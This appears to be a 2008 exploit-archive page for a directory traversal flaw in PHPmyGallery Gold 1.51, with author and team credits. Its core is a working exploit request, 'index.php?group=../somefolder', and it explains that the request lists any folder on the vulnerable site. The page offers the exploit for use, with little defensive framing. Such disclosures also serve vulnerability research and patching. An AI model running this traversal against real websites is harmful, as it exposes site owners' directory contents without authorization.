[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHPmyGallery Gold 1.51 (index.php) Directory Traversal Vulnerability
# Published : 2008-12-07
# Author : zAx
# Previous Title : QMail Mailing List Manager 1.2 Database Disclosure Vulnerability
# Next Title : ASP AutoDealer Remote Database Disclosure Vulnerability


############### Yee7.Com ###############
             ############### zAx #################
        PHPmyGallery Gold 1.51 (index.php) Folders Disclosure
 -----------------------------------------------------------------------------------------------------------

 [+] Script        : PHPmyGallery Gold 1.51
 [+] Vuln.          : Folders Disclosure
 [+] Download :http://phpmygallery.kapierich.net/en/downloads/
 [+] Discovered By  :         zAx [ThE-zAx@Hotmail.Com]
 [+] Team:  Electronic Security Team (Yee7.Com)

Exploit : http://site/phpmygallery/index.php?group=../somefolder

 [+]Somefolder is any folder in the vulnerable website
 [+] ../ = Up from this folder
 [+] You can see all folders those are in "somefolder"


[+] Important : This vulnerability is Discovered By Yee7-Team, By [ zAx ] and [ ShockShadow ]

# www.Syue.com [2008-12-07]